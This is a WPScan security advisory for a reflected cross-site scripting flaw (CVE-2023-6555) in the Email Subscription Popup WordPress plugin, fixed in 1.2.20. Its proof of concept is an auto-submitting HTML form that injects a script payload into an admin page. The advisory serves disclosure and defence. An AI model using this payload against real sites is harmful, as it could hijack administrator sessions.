WordPress Plugin Vulnerabilities

Email Subscription Popup < 1.2.20 - Reflected XSS

Description

The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Proof of Concept

Make a logged in admin open

<html>
    <body onload="document.forms[0].submit()">
        <form action="https://example.com/wp-admin/admin.php?page=email_subscription_popup_subscribers_management" method="POST">
            <input type="hidden" name="action" value="sendEmailForm" />
            <input type="hidden" name="sendEmailQueue" value="1" />
            <input type="hidden" name="queueemails" value="</textarea><img src onerror=alert(/XSS/)>" />
            <input type="submit" value="Submit" />
        </form>
    </body>
</html>

Affects Plugins

Plugin icon
email-subscribe
Fixed in 1.2.20

References

CVE
CVE-2023-6555

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher
Erwan LR (WPScan)
Submitter
Erwan LR (WPScan)
Submitter website
https://wpscan.com
Verified
Yes
WPVDB ID
58803934-dbd3-422d-88e7-ebbc5e8c0886

Timeline

Publicly Published
2023-12-15 (about 4 months ago)
Added
2023-12-15 (about 4 months ago)
Last Updated
2023-12-15 (about 4 months ago)

Other

Published
Title
Published
2023-08-11
Title
Kangu para WooCommerce < 2.2.10 - Reflected XSS
Published
2011-09-27
Title
Black Letterhead < 1.6 - XSS
Published
2024-03-29
Title
GetResponse for WordPress <= 5.5.35 - Contributor+ Stored XSS
Published
2014-08-01
Title
JS MultiHotel 2.2.1 - includes/delete_img.php path Parameter Reflected XSS
Published
2024-05-10
Title
Beaver Builder < 2.8.1.3 - Contributor+ Stored Cross-Site Scripting via photo widget crop attribute